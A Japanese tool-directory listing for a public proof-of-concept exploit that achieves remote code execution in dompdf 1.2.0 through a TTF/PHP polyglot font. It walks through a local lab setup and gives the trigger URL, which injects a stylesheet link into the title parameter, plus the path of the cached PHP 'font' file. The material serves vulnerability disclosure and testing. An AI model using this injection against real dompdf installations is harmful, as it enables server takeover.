Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
dompdf-rce — RCE exploit for dompdf | Kitploit
ツール/GitHubGitHub/positive-security/dompdf-rce
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubpositive-security/dompdf-rce

dompdf-rce

RCE exploit for dompdf

リポジトリを見る
179654年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

dompdf 向け RCE エクスプロイト

このリポジトリには、dompdf 1.2.0 を使用した脆弱なデモアプリケーションと、ttf+php ポリグロットファイルを介してリモートコード実行を実現するエクスプロイトが含まれています。

エクスプロイト概要

詳細は、https://positive.security/blog/dompdf-rce をご覧ください。

手順

  1. デモアプリケーションを実行します
root@kitploit:~
$ cd application
$ php -S localhost:9000
  1. エクスプロイトサーバーを実行します
root@kitploit:~
$ cd exploit
$ php -S localhost:9001
  1. エクスプロイトをトリガーします
root@kitploit:~
http://localhost:9000/index.php?pdf&title=<link rel=stylesheet href='http://localhost:9001/exploit.css'>
  1. キャッシュされた php「フォント」ファイルにアクセスして phpinfo() を実行します
root@kitploit:~
http://localhost:9000/dompdf/lib/fonts/exploitfont_normal_3f83639933428d70e74a061f39009622.php

注意: 異なるドメインやポートを使用する場合は、exploit/exploit.css を適宜編集し、完全なフォントファイル名を application/dompdf/lib/fonts で確認してください。

ツールをダウンロード